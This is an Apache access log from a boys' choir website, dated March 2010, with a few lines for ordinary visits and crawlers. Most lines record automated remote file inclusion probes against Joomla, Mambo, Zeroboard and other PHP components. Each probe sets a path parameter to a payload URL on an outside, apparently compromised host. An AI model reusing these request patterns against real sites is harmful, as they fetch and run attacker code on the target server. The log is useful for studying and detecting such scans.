121.88.4.74 - - [09/Mar/2010:05:56:00 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:05:56:02 -0800] "GET /?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:05:56:02 -0800] "GET /logs/access_100214.log%20%20/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
209.217.76.226 - - [09/Mar/2010:05:56:02 -0800] "GET /logs/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:56:59 -0800] "GET /logs/access_091229.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:05:57:00 -0800] "GET /logs/access_100228.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.7.205.103 - - [09/Mar/2010:06:00:07 -0800] "GET /logs/access_100205.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.ursula1.de/fdh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:02:08 -0800] "GET /logs/access_091229.log%20%20//skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:02:08 -0800] "GET /logs/access_091111.log%20%20//skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:02:08 -0800] "GET /logs//skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:02:08 -0800] "GET /skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:06:05:52 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:06:05:52 -0800] "GET /logs/access_100212.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:06:05:52 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
121.88.4.74 - - [09/Mar/2010:06:05:53 -0800] "GET /logs/access_091111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.dialog-kiado.hu/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:06:38 -0800] "GET /logs//skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:06:38 -0800] "GET /logs/access_091229.log//skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:06:38 -0800] "GET /skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:07:02 -0800] "GET /logs/access_091111.log//skin/sirini_ezset_fullpack/ask_password.php?dir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.114 - - [09/Mar/2010:06:07:18 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.114 - - [09/Mar/2010:06:07:18 -0800] "GET /bbs/write_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.114 - - [09/Mar/2010:06:07:18 -0800] "GET /logs/access_100214.log%20%20//bbs/write_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
207.46.199.196 - - [09/Mar/2010:06:08:33 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:06:08:36 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:06:08:36 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:06:08:36 -0800] "GET /logs/access_100212.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.228.220.59 - - [09/Mar/2010:06:10:44 -0800] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.228.220.59 - - [09/Mar/2010:06:10:44 -0800] "GET /logs/access_100213.log///index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.228.220.59 - - [09/Mar/2010:06:10:44 -0800] "GET /logs///index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:06:12:30 -0800] "GET /logs/access_100212.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:06:12:37 -0800] "GET /logs/access_100212.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.228.220.59 - - [09/Mar/2010:06:12:46 -0800] "GET /logs///index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.228.220.59 - - [09/Mar/2010:06:12:46 -0800] "GET /logs/access_100209.log%20%20///index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.228.220.59 - - [09/Mar/2010:06:12:46 -0800] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:12:47 -0800] "GET /logs/access_100209.log%20%20///index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:12:47 -0800] "GET /logs///index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:12:48 -0800] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:06:13:06 -0800] "GET /logs/access_100213.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:06:13:11 -0800] "GET /logs/access_100213.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://cnel.dongguk.ac.kr/zb41/bbs///skin/dognara_gallery/a??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:13:16 -0800] "GET /logs/access_100213.log///index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:13:16 -0800] "GET /logs///index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:13:16 -0800] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:16:28 -0800] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:16:28 -0800] "GET /logs///index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:16:28 -0800] "GET /logs/access_100213.log///index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:16:57 -0800] "GET /logs/access_100209.log///index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:06:17:13 -0800] "GET /logs/access_100209.log///index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:20:29 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:20:29 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:20:29 -0800] "GET /logs/access_100109.log//?_SERVER[DOCUMENT_ROOT]=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:20:59 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:20:59 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:20:59 -0800] "GET /logs/access_100109.log//?_SERVER[DOCUMENT_ROOT]=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.114 - - [09/Mar/2010:06:21:35 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.114 - - [09/Mar/2010:06:21:35 -0800] "GET /logs/access_100214.log//bbs/write_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:22:48 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:22:48 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:22:48 -0800] "GET /logs/access_091213.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:22:58 -0800] "GET /logs/access_100214.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:23:29 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:23:29 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:23:29 -0800] "GET /logs/access_091213.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:23:37 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:23:38 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:23:38 -0800] "GET /logs/access_100214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:23:48 -0800] "GET /logs/access_100214.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:24:00 -0800] "GET /logs/access_091213.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:24:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:24:16 -0800] "GET /logs/access_100214.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:24:16 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.158.94 - - [09/Mar/2010:06:24:34 -0800] "GET /logs/access_091213.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nanosystech.co.kr/board/js/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:06:25:40 -0800] "GET /logs/access_100112.log//includes/tgpinc.php?DOCUMENT_ROOT=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:06:25:40 -0800] "GET /includes/tgpinc.php?DOCUMENT_ROOT=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:06:25:40 -0800] "GET /logs//includes/tgpinc.php?DOCUMENT_ROOT=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:06:25:40 -0800] "GET /logs/access_091029.log//includes/tgpinc.php?DOCUMENT_ROOT=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:25:50 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:25:50 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.231.49.223 - - [09/Mar/2010:06:25:50 -0800] "GET /logs/access_100109.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.114 - - [09/Mar/2010:06:26:32 -0800] "GET /logs/access_100131.log//bbs/write_update.php?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:06:27:36 -0800] "GET /logs/access_091229.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:06:27:37 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:06:27:37 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
118.129.170.49 - - [09/Mar/2010:06:27:56 -0800] "GET /logs/access_100214.log%20%20/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.170.49 - - [09/Mar/2010:06:27:56 -0800] "GET /?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.129.170.49 - - [09/Mar/2010:06:27:56 -0800] "GET /logs/?board_skin_path=http://www.lovebyday.com/linux/Oid1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.americanboyschoir.com"
112.135.4.13 - - [09/Mar/2010:06:30:03 -0800] "GET /xxx/ HTTP/1.1" 200 662 "http://www.google.lk/search?sourceid=navclient&hl=en-GB&ie=UTF-8&rlz=1T4TSEA_en-GBLK339LK339&q=index+of%2fxxx" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)" "www.americanboyschoir.com"
112.135.4.13 - - [09/Mar/2010:06:30:06 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)" "www.americanboyschoir.com"
112.135.4.13 - - [09/Mar/2010:06:30:07 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Google Desktop/5.9.911.3589; http://desktop.google.com/)" "www.americanboyschoir.com"
112.135.4.13 - - [09/Mar/2010:06:30:08 -0800] "GET /xxx/resourcesgreg/ HTTP/1.1" 200 552 "http://www.americanboyschoir.com/xxx/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)" "www.americanboyschoir.com"
112.135.4.13 - - [09/Mar/2010:06:30:09 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)" "www.americanboyschoir.com"
112.135.4.13 - - [09/Mar/2010:06:30:11 -0800] "GET /xxx/ HTTP/1.1" 200 662 "http://www.americanboyschoir.com/xxx/resourcesgreg/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)" "www.americanboyschoir.com"
112.135.4.13 - - [09/Mar/2010:06:30:13 -0800] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/xxx/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)" "www.americanboyschoir.com"
112.135.4.13 - - [09/Mar/2010:06:30:18 -0800] "GET /xxx/ HTTP/1.1" 200 662 "http://www.americanboyschoir.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)" "www.americanboyschoir.com"
112.135.4.13 - - [09/Mar/2010:06:30:19 -0800] "GET /xxxx/ HTTP/1.1" 200 522 "http://www.americanboyschoir.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)" "www.americanboyschoir.com"
112.135.4.13 - - [09/Mar/2010:06:30:22 -0800] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/xxxx/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:06:30:28 -0800] "GET /logs/access_100117.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:06:30:28 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:06:30:28 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
112.135.4.13 - - [09/Mar/2010:06:30:29 -0800] "GET /xxx/ HTTP/1.1" 200 662 "http://www.americanboyschoir.com/xxx/resourcesgreg/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618; InfoPath.2)" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:06:30:57 -0800] "GET /logs/access_091229.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:06:30:57 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
222.109.127.201 - - [09/Mar/2010:06:30:57 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.americanboyschoir.com"
122.201.102.68 - - [09/Mar/2010:06:31:00 -0800] "GET /appserv/main.php?appserv_root=http://www.muzykologia.lublin.pl/templates/system/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
